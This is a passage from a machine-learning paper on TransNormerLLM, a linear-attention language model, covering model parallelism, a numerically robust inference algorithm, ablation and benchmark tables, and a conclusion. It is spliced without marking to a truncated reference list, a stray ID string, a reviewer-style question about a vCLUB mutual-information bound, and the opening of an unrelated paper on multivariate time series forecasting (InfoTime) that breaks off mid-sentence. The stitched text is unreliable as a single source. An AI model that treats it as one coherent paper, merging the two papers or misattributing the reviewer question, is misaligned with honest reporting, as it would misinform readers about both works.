In addition to the previously mentioned optimization endeavors, we delve deeper into system engineering by implementing model parallelism specifically tailored to linear transformers, drawing inspiration from Megatron-LM model parallelism (Shoeybi et al., 2019). In a standard transformer model, each transformer layer comprises a self-attention block followed by a two-layer multi-layer perceptron (MLP) block, and Megatron-LM model parallelism addresses these two blocks independently. Similarly, within the architecture of TransNormerLLM, characterized by its two primary components, SGLU and GLA, we apply model parallelism to each of these components separately. The details of our model parallelism strategies are elaborated below.

**Model Parallelism on SGLU** Recall the SGLU structure in (5):

$$O = [(XW_v) \odot (XW_u)]W_o.$$ (11)

Its model parallelism adaptation is as follows:

$$[O'_1, O'_2] = X[W_v^1, W_v^2] \odot X[W_u^1, W_u^2] = [XW_v^1, XW_v^2] \odot [XW_u^1, XW_u^2],$$ (12)

which splits the weight matrices $W_v$ and $W_u$ along their columns and obtains an output matrix that is also split along its columns. Then the split output $[O'_1, O'_2]$ is multiplied by another matrix, which is split along its rows:

$$O = [O'_1, O'_2][W_o^1, W_o^2]^\top = O'_1 W_o^1 + O'_2 W_o^2.$$ (13)

As with model parallelism in Megatron-LM, this whole procedure splits the three general matrix multiplies (GEMMs) inside the SGLU block across multiple GPUs and introduces only a single all-reduce collective communication operation in each of the forward and backward passes.

**Model Parallelism on GLA** Recall the GLA block in (3) and (4); its model parallelism version is:

$$[O_1, O_2] = \text{SRMSNorm}(QK^\top V) \odot U,$$ (14)

where

$$Q = [\phi(XW_q^1), \phi(XW_q^2)], \quad K = [\phi(XW_k^1), \phi(XW_k^2)], \quad V = X[W_v^1, W_v^2], \quad U = X[W_u^1, W_u^2].$$ (15)

Note that in our implementation we use a combined QKUV projection to improve computation efficiency for linear attention. The split output matrix $[O_1, O_2]$ is again multiplied by a weight matrix split along its rows, similar to (13).

Algorithm 1 Original Inference Algorithm
Input: \( q_t, k_t, v_t, t = 1, \ldots, n; \)
Output: \( o_t, t = 1, \ldots, n; \)
Initialize: \( [kv]_0 = 0; \)
for \( t = 1, \ldots, n \) do
\( [kv]_t = [kv]_{t-1} + k_t \lambda^{-t} v_t^\top, \)
\( o_t = q_t \lambda^t [kv]_t. \)
end for

Algorithm 2 Robust Inference Algorithm
Input: \( q_t, k_t, v_t, t = 1, \ldots, n; \)
Output: \( o_t, t = 1, \ldots, n; \)
Initialize: \( [\widetilde{kv}]_0 = 0; \)
for \( t = 1, \ldots, n \) do
\( [\widetilde{kv}]_t = \lambda [\widetilde{kv}]_{t-1} + k_t v_t^\top, \)
\( o_t = q_t [\widetilde{kv}]_t. \)
end for

3.3 ROBUST INFERENCE

In this section, we discuss the inference problem in TransNormerLLM. It is important to note that Eq. 1 can be decomposed into the following form:

\[ a_{st} = (q_s \lambda^s e^{i\theta s})^\top (k_t \lambda^{-t} e^{-i\theta t}). \] (16)

This allows TransNormerLLM to perform inference in the form of an RNN; details of the procedure are given in Algorithm 1. However, it is worth noting that \( \lambda < 1 \), which results in:

\[ \|q_s \lambda^s e^{i\theta s}\|_2 = \|q_s\|_2 \lambda^s \to 0, \qquad \|k_t \lambda^{-t} e^{-i\theta t}\|_2 = \|k_t\|_2 \lambda^{-t} \to \infty, \] (17)

leading to numerical precision issues.
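To see the instability concretely, here is a minimal NumPy sketch of the two boxed procedures above (the decay value and the toy dimensions are illustrative): the explicit λ^{±t} factors of Algorithm 1 overflow in single precision long before typical pretraining sequence lengths, while the rescaled recurrence of Algorithm 2 keeps every intermediate bounded.

```python
import numpy as np

def inference_original(q, k, v, lam):
    """Algorithm 1: carries explicit lam**(-t) / lam**t factors."""
    n, d = q.shape
    kv = np.zeros((d, v.shape[1]))
    out = []
    for t in range(1, n + 1):
        kv = kv + np.outer(k[t - 1] * lam ** (-t), v[t - 1])
        out.append(lam ** t * (q[t - 1] @ kv))
    return np.stack(out)

def inference_robust(q, k, v, lam):
    """Algorithm 2: rescaled recurrence; every intermediate stays bounded."""
    n, d = q.shape
    kv = np.zeros((d, v.shape[1]))
    out = []
    for t in range(n):
        kv = lam * kv + np.outer(k[t], v[t])
        out.append(q[t] @ kv)
    return np.stack(out)

rng = np.random.default_rng(0)
n, d, lam = 100, 8, 0.9
q, k, v = rng.standard_normal((3, n, d))

# In float64 at short lengths the two procedures agree exactly ...
print(np.allclose(inference_original(q, k, v, lam), inference_robust(q, k, v, lam)))
# ... but the explicit factor of Algorithm 1 overflows in single precision:
print(np.float32(lam) ** np.float32(-900))  # inf (0.9**-900 is about 1e41 > float32 max)
```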
To avoid these issues, we propose the Robust Inference Algorithm (Algorithm 2). Since \( \|q_s e^{i\theta s}\| = \|q_s\| \) and \( \|k_t e^{-i\theta t}\| = \|k_t\| \), for simplicity we omit LRPE (Qin et al., 2023b) in the subsequent discussion and consider only \( a_{st} = q_s^\top k_t \lambda^{s-t} \). We provide a mathematical proof of \( [kv]_t = \lambda^{-t}[\widetilde{kv}]_t \), where \( [\widetilde{kv}]_t \) denotes the state maintained by Algorithm 2, in Appendix C.

4 EXPERIMENTS

We use PyTorch (Paszke et al., 2019) and Triton (Tillet et al., 2019) to implement TransNormerLLM in the Metaseq framework (Zhang et al., 2022). Our model is trained using the Adam optimizer (Kingma & Ba, 2017), and we employ FSDP to efficiently scale our model to NVIDIA A100 80G clusters. We additionally leverage model parallelism as appropriate to optimize performance. In the ablation studies, all models are trained on a 300B-token sample of our corpus. To reduce the fluctuation of losses and PPLs in the tables below, we compute the average loss and PPL of the last 1k iterations as the final metrics. For our benchmark models, we train our 385M, 1B, and 7B models on our corpus for 1 trillion, 1.2 trillion, and 1.4 trillion tokens, respectively. We use an input sequence length of 8192 tokens in our pretraining process. For a comprehensive understanding of our corpus, encompassing details such as data preprocessing methods and tokenization procedures, we direct interested readers to Appendix D.

4.1 ARCHITECTURE ABLATIONS

Transformer vs. TransNormerLLM We carried out a meticulous series of comparative tests between our TransNormerLLM and Transformer, spanning an array of disparate sizes. The comparative performance of these models is clearly illustrated in Table 1. Under identical configurations, it becomes evident that our TransNormerLLM exhibits a superior performance profile compared to Transformer. We observed that TransNormerLLM outperformed Transformer by a remarkable 5% at the size of 385M. More importantly, as the size reached 1B, this superiority became even more pronounced, with an advantage of 9% for TransNormerLLM over Transformer.

Table 1: Transformer vs. TransNormerLLM. TransNormerLLM performs better than Transformer at sizes of 385M and 1B under identical configurations, by 5% and 9%, respectively.

| Method | Size | Updates | Loss | PPL |
|----------------|------|---------|-------|-------|
| Transformer | 385M | 100K | 2.362 | 5.160 |
| TransNormerLLM | 385M | 100K | 2.248 | 4.770 |
| Transformer | 1B | 100K | 2.061 | 4.765 |
| TransNormerLLM | 1B | 100K | 1.896 | 3.729 |

TransNormer vs. TransNormerLLM We compare the original TransNormer and the improved TransNormerLLM; the results are shown in Table 2. TransNormerLLM exhibits an enhancement of 2% and 1%, respectively.

Table 2: TransNormer vs. TransNormerLLM.

| Method | Params | Updates | Loss | PPL |
|-----------------|--------|---------|------|-----|
| TransNormerLLM | 385M | 100K | 2.248 | 4.770 |
| TransNormer-T1 | 379M | 100K | 2.290 | 4.910 |
| TransNormer-T2 | 379M | 100K | 2.274 | 4.858 |

Positional Encoding In the positional encoding experiment, we conducted a series of tests comparing Mix (LRPE-d for the first layer, Exp-Decay for the rest), APE (Absolute Positional Encoding), LRPE, Exp-Decay (Exponential Decay), and LRPE-d. As is evident from Table 3, Mix and LRPE-d achieve better performance than the other options. We select the Mix positional encoding as it boosts training speed by up to 20% while being only slightly worse than LRPE-d. We also perform ablations on the decay temperature \( \left(1 - \frac{l}{L}\right) \) in Eq. 2; the perplexity of TransNormerLLM is reduced by adding the decay temperature, as shown in Table 4.
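As a quick numerical illustration of the schedule in Eq. 2, the sketch below computes λ for every (layer, head) pair; the head and layer counts are illustrative. Note that the last layer comes out as all ones, i.e., no decay, matching the statement that its tokens attend globally.

```python
import torch

def decay_rates(num_heads, num_layers):
    """lambda_{l,h} = exp(-(8h/H) * (1 - l/L)) as in Eq. 2; returns (L, H)."""
    h = torch.arange(1, num_heads + 1)
    l = torch.arange(1, num_layers + 1)
    return torch.exp(-(8 * h / num_heads)[None, :] * (1 - l / num_layers)[:, None])

lam = decay_rates(num_heads=8, num_layers=4)
print(lam[0])   # first layer: smallest lambdas, fastest decay, most local attention
print(lam[-1])  # last layer: all ones, no decay, global attention
```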
Gating Mechanism We conduct ablation studies to examine the effect of the gating mechanism. As shown in Table 5, the gate enables a reduction of the loss value from 2.263 to 2.248.

GLA Activation Functions We conducted experiments on the GLA (Gated Linear Attention) structure with respect to the activation function. As shown in Table 6, using swish and 1+elu leads to similar performance; however, in our experiments, using 1+elu in our 7B model may encounter a NaN problem, so we use swish in our model.

GLU Activation Functions We conduct an experiment removing the activation function within the Gated Linear Units (GLU) structure. As shown in Table 7, this alteration has a negligible impact on the final outcome. As a result, we adopt the Simple Gated Linear Units (SGLU) structure in our final model configuration.

Normalization Functions In our study, we conducted a series of ablation tests employing various normalization methods, including SRMSNorm, RMSNorm, and LayerNorm. The results indicate that there is almost no difference among these methods when applied to TransNormerLLM. Nevertheless, during the course of our testing, we re-engineered SRMSNorm using Triton. As shown in Figure 2, empirical evidence supports that our implementation offers a significant boost in computational speed when operating with larger dimensions, compared to the PyTorch implementation.

Lightning Attention We conducted a speed and memory comparison between our Lightning Attention and the baseline, the PyTorch implementation of NormAttention (Qin et al., 2022a). Figure 3 (left) reports the runtime in milliseconds of the forward + backward pass: the baseline runtime grows quadratically with sequence length, while Lightning Attention operates significantly faster, at least 2× faster than the PyTorch implementation. Figure 3 (right) reports the memory footprint of Lightning Attention compared to the baseline: the memory footprint of Lightning Attention grows linearly with sequence length and is up to 4× more efficient than the baseline at a sequence length of 8192. Our proposed Lightning Attention achieves superior efficiency.

Table 3: Positional encoding. LRPE-d leads to the best outcome.

| PE Methods | Params | Updates | Loss | PPL |
|------------|--------|---------|------|-----|
| Mix | 385M | 100K | 2.248 | 4.770 |
| APE | 386M | 100K | 2.387 | 5.253 |
| Exp-Decay | 385M | 100K | 2.267 | 4.834 |
| LRPE | 385M | 100K | 2.287 | 4.899 |
| LRPE-d | 385M | 100K | 2.236 | 4.728 |

Table 4: Ablations on the decay temperature. Using the decay temperature proves superior.

| Temperature | Params | Updates | Loss | PPL |
|-------------|--------|---------|------|-----|
| w/ temperature | 385M | 100K | 2.248 | 4.770 |
| w/o temperature | 385M | 100K | 2.258 | 4.804 |

Table 5: Ablations on the gating mechanism. Performance with the gate proves superior.

| Gate | Params | Updates | Loss | PPL |
|------|--------|---------|------|-----|
| w/ gate | 385M | 100K | 2.248 | 4.770 |
| w/o gate | 379M | 100K | 2.263 | 4.820 |

Table 6: Ablations on GLA activation functions. The results obtained with different activation functions are virtually identical.
| GLA Act | Params | Updates | Loss | PPL |
|---------|--------|---------|------|-----|
| Swish | 385M | 100K | 2.248 | 4.770 |
| No Act | 385M | 100K | 2.283 | 4.882 |
| 1+elu | 385M | 100K | 2.252 | 4.767 |

Table 7: Ablations on GLU activation functions. Excluding the activation function has no negative impact on the results.

| GLU Act | Params | Updates | Loss | PPL |
|---------|--------|---------|------|-----|
| No Act | 385M | 100K | 2.248 | 4.770 |
| Swish | 385M | 100K | 2.254 | 4.788 |

Table 8: Normalization functions. The deviation in results among the following normalization functions is minimal.

| Norm Type | Params | Updates | Loss | PPL |
|-----------|--------|---------|------|-----|
| SRMSNorm | 385M | 100K | 2.248 | 4.770 |
| RMSNorm | 385M | 100K | 2.247 | 4.766 |
| LayerNorm | 385M | 100K | 2.247 | 4.765 |

Figure 2: Performance evaluation of the SRMSNorm implementation. The upper figures show the runtime comparison of the forward pass (left) and backward pass (right) for different sequence lengths, with a fixed feature dimension of 3072. The lower two figures show the runtime comparison for various feature dimensions, with a fixed sequence length of 4096.

Figure 3: Memory and speed comparison between linear attention and Lightning Attention. Left: runtime of the forward + backward pass in milliseconds for different sequence lengths, with a fixed feature dimension of 2048. Right: memory footprint of the forward + backward pass for different sequence lengths, with a fixed feature dimension of 2048.

Figure 4: Inference time and memory footprint. Left: inference runtime measured in milliseconds across different sequence lengths. Right: memory consumption during inference for varying sequence lengths. Notably, as the sequence length increases, TransNormerLLM maintains a consistent inference time and memory footprint.

4.2 BENCHMARKS

In order to validate the effectiveness of TransNormerLLM, we tested our 385M, 1B, and 7B models on Commonsense Reasoning tasks, MMLU (Hendrycks et al., 2021), CMMLU (Li et al., 2023), and C-Eval (Huang et al., 2023). For comparison, we selected several open-source models as competitors, including Transformer-based models such as OPT (Zhang et al., 2022), Pythia (Biderman et al., 2023), BLOOM (Workshop et al., 2023), GPT-Neo (Black et al., 2022), GPT-J (Wang & Komatsuzaki, 2021), MPT (Team et al., 2023), Falcon (Almazrouei et al., 2023), LLaMA 1/2 (Touvron et al., 2023a;b), OpenLLaMA v1/v2 (Geng & Liu, 2023), Baichuan 1/2 (Baichuan, 2023), ChatGLM 1/2 (Zeng et al., 2022; Du et al., 2022), and the non-Transformer model RWKV (Peng et al., 2023b). It can be observed that, compared to these models, TransNormerLLM remains highly competitive.

Table 9: Performance comparison on Commonsense Reasoning and aggregated benchmarks. For a fair comparison, we report competing methods' results reproduced by us using their released models. Official results are denoted in *italics*. PS: parameter size (billion). T: tokens (trillion). HS: HellaSwag. WG: WinoGrande.
| Model | PS | T | BoolQ | PIQA | HS | WG | ARC-e | ARC-c | OBQA | MMLU | CMMLU | C-Eval |
|---------|------|------|-------|-------|-------|-------|-------|-------|-------|-------|-------|--------|
| OPT | 0.35 | 0.30 | 57.74 | 64.58 | 36.69 | 52.49 | 44.02 | 23.89 | 28.20 | 26.02 | 25.34 | 25.71 |
| Pythia | 0.40 | 0.30 | 60.40 | 67.08 | 40.52 | 53.59 | 51.81 | 24.15 | 29.40 | 25.99 | 25.16 | 24.81 |
| BLOOM | 0.56 | 0.35 | 55.14 | 64.09 | 36.97 | 52.80 | 47.35 | 23.98 | 28.20 | 24.80 | 25.35 | 27.14 |
| RWKV | 0.43 | 0.30 | - | 67.52 | 40.90 | 51.14 | 52.86 | 25.17 | 32.40 | 24.85 | - | - |
| Ours | 0.39 | 1.0 | 62.14 | 66.70 | 46.27 | 54.46 | 55.43 | 27.99 | 32.40 | 25.90 | 25.05 | 25.24 |
| GPT-Neo | 1.3 | 0.3 | 61.99 | 71.11 | 48.93 | 54.93 | 56.19 | 25.85 | 33.60 | 24.82 | 26.03 | 23.94 |
| OPT | 1.3 | 0.3 | 57.77 | 71.71 | 53.70 | 59.35 | 57.24 | 29.69 | 33.20 | 24.96 | 24.97 | 25.32 |
| Pythia | 1.4 | 0.3 | 60.73 | 70.67 | 47.18 | 53.51 | 56.99 | 26.88 | 31.40 | 26.55 | 25.13 | 24.25 |
| BLOOM | 1.1 | 0.35 | 59.08 | 67.14 | 42.98 | 54.93 | 51.47 | 25.68 | 29.40 | 27.30 | 25.09 | 26.50 |
| RWKV | 1.5 | 0.3 | - | 72.36 | 52.48 | 54.62 | 60.48 | 29.44 | 34.00 | 25.77 | - | - |
| Falcon | 1.0 | 0.35 | 61.38 | 73.14 | 61.30 | 60.30 | 62.71 | 32.17 | 33.60 | 23.28 | 24.88 | 25.66 |
| Ours | 1.0 | 1.2 | 63.27 | 72.09 | 56.49 | 60.38 | 63.68 | 35.24 | 36.60 | 27.10 | 25.88 | 26.01 |
| GPT-J | 6.9 | 0.3 | 63.44 | 75.41 | 64.75 | 64.09 | 66.92 | 36.60 | 38.20 | 25.70 | 26.47 | 25.39 |
| OPT | 6.7 | 0.3 | 66.18 | 76.22 | 67.21 | 69.19 | 65.66 | 34.64 | 37.29 | 25.57 | 25.36 | 25.32 |
| Pythia | 6.9 | 0.3 | 63.46 | 75.14 | 63.92 | 60.77 | 67.34 | 35.11 | 37.00 | 24.64 | 25.56 | 26.40 |
| BLOOM | 7.1 | 0.35 | 62.91 | 72.69 | 62.33 | 64.01 | 65.11 | 33.45 | 35.80 | 26.25 | 24.97 | 24.25 |
| RWKV | 7.4 | 0.3 | - | 76.06 | 65.51 | 61.01 | 67.80 | 37.46 | 40.20 | 24.96 | - | - |
| MPT | 6.9 | 1.0 | 73.88 | 79.43 | 76.25 | 68.27 | 74.79 | 41.72 | 42.20 | 30.80 | 25.99 | 24.06 |
| Falcon | 7.2 | 1.5 | 73.73 | 79.38 | 76.30 | 67.17 | 74.62 | 43.60 | 43.80 | 27.79 | 25.73 | 22.92 |
| Baichuan1 | 7.0 | 1.2 | 70.09 | 76.01 | 70.06 | 64.09 | 71.72 | 40.53 | 38.20 | 42.30 | 44.43 | 42.80 |
| Baichuan2 | 7.0 | 2.6 | 72.72 | 76.50 | 72.17 | 68.35 | 75.17 | 42.32 | 39.60 | 54.16 | 57.07 | 54.00 |
| ChatGLM1 | 6.7 | 1.0 | 74.74 | 68.88 | 45.57 | 52.25 | 48.78 | 31.66 | 36.80 | 40.63 | 37.48 | 40.23 |
| ChatGLM2 | 7.1 | 1.4 | 77.65 | 69.37 | 50.51 | 57.62 | 59.13 | 34.30 | 37.00 | 45.46 | 48.80 | 52.55 |
| OpenLLaMA v1 | 6.7 | 1.0 | 70.43 | 75.68 | 69.23 | 66.69 | 71.17 | 38.57 | 39.00 | 30.49 | 25.40 | 26.09 |
| OpenLLaMA v2 | 6.7 | 1.0 | 72.20 | 78.84 | 74.51 | 65.67 | 72.39 | 41.30 | 41.00 | 41.29 | 29.58 | 30.01 |
| LLaMA1 | 6.7 | 1.0 | 76.50 | 79.80 | 76.10 | 70.10 | 72.80 | 47.60 | 57.20 | 35.10 | 25.62 | 25.72 |
| LLaMA2 | 6.7 | 2.0 | 77.68 | 78.07 | 76.02 | 68.98 | 76.30 | 46.33 | 44.20 | 45.30 | 32.96 | 33.20 |
| Ours | 6.8 | 1.4 | 75.87 | 80.09 | 75.21 | 66.06 | 75.42 | 44.40 | 63.40 | 43.10 | 47.99 | 43.18 |

**Commonsense Reasoning** We report BoolQ (Clark et al., 2019), PIQA (Bisk et al., 2019), SIQA (Sap et al., 2019), HellaSwag (Zellers et al., 2019), WinoGrande (Sakaguchi et al., 2019), ARC easy and challenge (Clark et al., 2018), OpenBookQA (Mihaylov et al., 2018), and their average. We report 0-shot results for all benchmarks using LM-Eval-Harness (Gao et al., 2021). All of our models achieve competitive performance compared with existing state-of-the-art LLMs, showcasing a remarkable ability to comprehend and apply commonsense reasoning.
**Aggregated Benchmarks** We report the overall results for MMLU (Hendrycks et al., 2021), CMMLU (Li et al., 2023), and C-Eval (Huang et al., 2023). Official scripts were used for evaluating MMLU, CMMLU, and C-Eval, with all evaluations conducted in a 5-shot setup. In comparison to top-tier open-source models available in the industry, our models demonstrate matching performance in both English and Chinese benchmarks.

### 4.3 SCALING TO 175B

Furthermore, we have carried out a series of experiments to assess the efficacy of model parallelism as applied to the TransNormerLLM architecture. The comprehensive outcomes of these experiments are presented in Appendix E.1. Moreover, our research extends to the evaluation of various cutting-edge system optimization techniques, encompassing their impact on both training speed and context length across models ranging from 7B to 175B in scale. The detailed results of these experiments are documented in Appendix E.2.

### 5 CONCLUSION

We introduced TransNormerLLM in this paper, an improved TransNormer tailored for LLMs. Our TransNormerLLM consistently outperformed Transformers in both accuracy and efficiency. Extensive ablations demonstrate the effectiveness of our modifications and innovations in position encoding, the gating mechanism, activation functions, normalization functions, and Lightning Attention. These modifications collectively contribute to TransNormerLLM's outstanding performance, positioning it as a promising choice for state-of-the-art language models. The benchmark results for models with sizes of 385 million, 1 billion, and 7 billion parameters unequivocally demonstrate that TransNormerLLM not only matches the performance of current leading Transformer-based Large Language Models (LLMs) but also enjoys faster inference speeds. We will release our pre-trained TransNormerLLM models to foster community advancement in efficient LLMs.

REFERENCES

Ebtesam Almazrouei, Hamza Alobeidli, Abdulaziz Alshamsi, Alessandro Cappelli, Ruxandra Cojocaru, Merouane Debbah, Etienne Goffinet, Daniel Heslow, Julien Launay, Quentin Malartic, et al. Falcon-40B: An open large language model with state-of-the-art performance. Technical report, Technology Innovation Institute, 2023.

Baichuan. Baichuan 2: Open large-scale language models. arXiv preprint arXiv:2309.10305, 2023. URL https://arxiv.org/abs/2309.10305.

Iz Beltagy, Matthew E. Peters, and Arman Cohan. Longformer: The long-document transformer, 2020.

Stella Biderman, Hailey Schoelkopf, Quentin Anthony, Herbie Bradley, Kyle O'Brien, Eric Hallahan, Mohammad Aflah Khan, Shivanshu Purohit, USVSN Sai Prashanth, Edward Raff, Aviya Skowron, Lintang Sutawika, and Oskar van der Wal. Pythia: A suite for analyzing large language models across training and scaling, 2023.

Yonatan Bisk, Rowan Zellers, Ronan Le Bras, Jianfeng Gao, and Yejin Choi. PIQA: Reasoning about physical commonsense in natural language, 2019.

Sid Black, Stella Biderman, Eric Hallahan, Quentin Anthony, Leo Gao, Laurence Golding, Horace He, Connor Leahy, Kyle McDonell, Jason Phang, et al. GPT-NeoX-20B: An open-source autoregressive language model. arXiv preprint arXiv:2204.06745, 2022.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in Neural Information Processing Systems, 33:1877–1901, 2020.
Rewon Child, Scott Gray, Alec Radford, and Ilya Sutskever. Generating long sequences with sparse transformers, 2019.

Krzysztof Marcin Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Quincy Davis, Afroz Mohiuddin, Lukasz Kaiser, David Benjamin Belanger, Lucy J Colwell, and Adrian Weller. Rethinking attention with performers. In International Conference on Learning Representations, 2021. URL https://openreview.net/forum?id=Ua6zuk0WRH.

Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, Parker Schuh, Kensen Shi, Sasha Tsvyashchenko, Joshua Maynez, Abhishek Rao, Parker Barnes, Yi Tay, Noam Shazeer, Vinodkumar Prabhakaran, Emily Reif, Nan Du, Ben Hutchinson, Reiner Pope, James Bradbury, Jacob Austin, Michael Isard, Guy Gur-Ari, Pengcheng Yin, Toju Duke, Anselm Levskaya, Sanjay Ghemawat, Sunipa Dev, Henryk Michalewski, Xavier Garcia, Vedant Misra, Kevin Robinson, Liam Fedus, Denny Zhou, Daphne Ippolito, David Luan, Hyeontaek Lim, Barret Zoph, Alexander Spiridonov, Ryan Sepassi, David Dohan, Shivani Agrawal, Mark Omernick, Andrew M. Dai, Thanumalayan Sankaranarayana Pillai, Marie Pellat, Aitor Lewkowycz, Erica Moreira, Rewon Child, Oleksandr Polozov, Katherine Lee, Zongwei Zhou, Xuezhi Wang, Brennan Saeta, Mark Diaz, Orhan Firat, Michele Catasta, Jason Wei, Kathy Meier-Hellstern, Douglas Eck, Jeff Dean, Slav Petrov, and Noah Fiedel. PaLM: Scaling language modeling with pathways, 2022.

Christopher Clark, Kenton Lee, Ming-Wei Chang, Tom Kwiatkowski, Michael Collins, and Kristina Toutanova. BoolQ: Exploring the surprising difficulty of natural yes/no questions, 2019.

Peter Clark, Isaac Cowhey, Oren Etzioni, Tushar Khot, Ashish Sabharwal, Carissa Schoenick, and Oyvind Tafjord. Think you have solved question answering? Try ARC, the AI2 Reasoning Challenge, 2018.

Tri Dao. FlashAttention-2: Faster attention with better parallelism and work partitioning. arXiv preprint arXiv:2307.08691, 2023.

Tri Dao, Daniel Y. Fu, Stefano Ermon, Atri Rudra, and Christopher Ré. FlashAttention: Fast and memory-efficient exact attention with IO-awareness. In Advances in Neural Information Processing Systems, 2022a.
gyJpajLkX2
Additionally, on the upper bound, the authors state that they choose to adopt the sampled vCLUB and minimize $I_{vCLUB\text{-}S}(X^o; Z^i)$. Could they expand on why this sampling strategy was chosen and what the actual derived upper bound might be?
Enhancing Multivariate Time Series Forecasting with Mutual Information-driven Cross-variable and Temporal Modeling

Anonymous authors Paper under double-blind review

Abstract

Recent research has showcased the significant effectiveness of deep learning techniques for multivariate time series forecasting (MTSF). Broadly speaking, these techniques fall into two categories: Channel-independence and Channel-mixing approaches. While Channel-independence models have generally demonstrated superior outcomes, Channel-mixing methods, especially when dealing with time series that display inter-variable correlations, theoretically promise enhanced performance by incorporating the correlation between variables. However, we contend that the unnecessary integration of information through Channel-mixing can curtail the potential enhancement in MTSF model performance. To substantiate this claim, we introduce Cross-variable Decorrelation Aware feature Modeling (CDAM) for Channel-mixing approaches. This approach is geared toward reducing superfluous information by minimizing the mutual information between the latent representation of a single univariate sequence and its accompanying multivariate sequence input, while maximizing the joint mutual information shared between the latent representation, its univariate input, and the associated univariate forecast series. Notably, prevailing techniques directly project future series using a single-step forecaster, sidelining the temporal correlation that might exist across varying timesteps in the target series. Addressing this gap, we introduce Temporal correlation Aware Modeling (TAM). This strategy maximizes the mutual information between adjacent subsequences of both the forecasted and target series. By synergizing CDAM and TAM, we build a new framework for MTSF, named InfoTime. Comprehensive experimental analyses demonstrate that InfoTime consistently outperforms existing models, including those considered state-of-the-art.

1 Introduction

Multivariate time series forecasting (MTSF) plays a pivotal role in diverse applications ranging from traffic flow estimation (Bai et al., 2020), weather prediction (Chen et al., 2021), and energy consumption (Zhou et al., 2021) to healthcare (Bahadori & Lipton, 2019). Deep learning has ushered in a new era for MTSF, with methodologies rooted in RNN-based (Franceschi et al., 2019; Liu et al., 2018; Salinas et al., 2020; Rangapuram et al., 2018) and CNN-based models (Lea et al., 2017; Lai et al., 2018) that surpass the performance of traditional techniques (Box et al., 2015). A notable breakthrough has been the advent of Transformer-based models (Li et al., 2019; Zhou et al., 2021; Chen et al., 2021; Zhou et al., 2022). Equipped with attention mechanisms, these models adeptly seize long-range temporal dependencies, establishing a new benchmark for forecasting efficacy. While their primary intent is to harness multivariate correlations, recent research indicates a potential shortcoming: these models might not sufficiently discern cross-variable dependencies (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022). This has spurred initiatives to tease out single-variable information for more nuanced forecasting.

When it comes to modeling variable dependencies, MTSF models can be broadly classified into two categories: Channel-mixing models and Channel-independence models, as highlighted in Figure 1(a) (Nie et al., 2022).
Specifically, Channel-mixing models ingest all features from the time series, projecting them into an embedding space to blend information. Conversely, Channel-independence models restrict their input token to information sourced from just one channel. Recent studies (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022) indicate that Channel-independence models significantly outpace Channel-mixing models on certain datasets. Yet this advantage comes with a trade-off: the omission of crucial cross-variable information. Such an omission can be detrimental, especially when the variables inherently correlate. Illustratively, Figure 1(b) showcases traffic flow variations from six proximate detectors in the PEMS08 dataset (Chen et al., 2001). A discernible common trend emerges across these detectors, suggesting that exploiting their interrelated patterns could bolster predictive accuracy for future traffic flows. In a comparative experiment, we trained both a Channel-independence model (PatchTST) and a Channel-mixing model (Informer) on the PEMS08 dataset. The outcome, visualized in Figure 1(c), shows Informer's superior performance over PatchTST, underscoring the importance of cross-variable insights.

Motivated by these findings, we introduce Cross-Variable Decorrelation Aware Feature Modeling (CDAM) for Channel-mixing methodologies. CDAM aims to hone in on cross-variable information and prune redundant data. It achieves this by minimizing the mutual information between the latent representation of an individual univariate time series and the related multivariate inputs, while concurrently maximizing the joint mutual information between that latent representation, its univariate input, and the subsequent univariate forecast.

Apart from modeling channel dependence, another significant challenge in MTSF is the accumulation of errors over time, as shown in Figure 1(a). To mitigate this, a number of studies (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan) have adopted a direct forecasting strategy using a single-step forecaster, typically configured as a fully-connected network, that generates multi-step predictions in a single step. Although often superior to auto-regressive forecasters, this method tends to neglect the temporal correlations across varying timesteps in the target series, curtailing its potential to capture series inter-dependencies effectively. Drawing inspiration from the notable temporal relationships observed between adjacent sub-sequences after downsampling (Liu et al., 2022a), we propose Temporal Correlation Aware Modeling (TAM), which iteratively downsamples and optimizes the mutual information between consecutive sub-sequences of both the forecasted and target series.

In essence, this paper delves into two pivotal challenges in multivariate time series forecasting: **cross-variable relationships** and **temporal relationships**. Drawing inspiration from these challenges, we develop a novel framework, denoted as InfoTime, which seamlessly integrates CDAM and TAM. Our paper's key contributions encompass:

- We introduce Cross-Variable Decorrelation Aware Feature Modeling (CDAM), designed specifically for Channel-mixing methods. It adeptly distills cross-variable information while filtering out superfluous information.
- Our proposed Temporal Correlation Aware Modeling (TAM) is tailored to effectively capture the temporal correlations across varying timesteps in the target series.
- Synthesizing CDAM and TAM, we unveil a new framework for MTSF, denoted as InfoTime. Through rigorous experimentation on diverse real-world datasets, it is evident that InfoTime consistently eclipses existing Channel-mixing benchmarks, achieving superior accuracy and notably mitigating overfitting. Furthermore, InfoTime enhances the efficacy of Channel-independence models, especially in instances with ambiguous cross-variable traits.

2 RELATED WORK

2.1 MULTIVARIATE TIME SERIES FORECASTING

Multivariate time series forecasting is the task of predicting future values of variables given historical observations. With the development of deep learning, various neural models have been proposed and have demonstrated promising performance in this task. RNN-based (Franceschi et al., 2019; Salinas et al., 2020; Rangapuram et al., 2018) and CNN-based (Lea et al., 2017; Lai et al., 2018) models were proposed to model time series data using RNNs or CNNs, respectively, but these models have difficulty modeling long-term dependencies. In recent years, a large body of work has tried to apply Transformer models to forecast long-term multivariate series and has shown great potential (Li et al., 2019; Zhou et al., 2021; Chen et al., 2021; Zhou et al., 2022; Nie et al., 2022). In particular, LogTrans (Li et al., 2019) proposes LogSparse attention to reduce the complexity from $O(L^2)$ to $O(L(\log L)^2)$. Informer (Zhou et al., 2021) utilizes the sparsity of attention scores through KL-divergence estimation and proposes the ProbSparse self-attention mechanism, which achieves $O(L \log L)$ complexity. Autoformer (Chen et al., 2021) introduces a decomposition architecture with an Auto-Correlation mechanism to capture the seasonal and trend features of the historical series, which also achieves $O(L \log L)$ complexity with better performance. Afterward, FEDformer (Zhou et al., 2022) employs a mixture-of-experts to 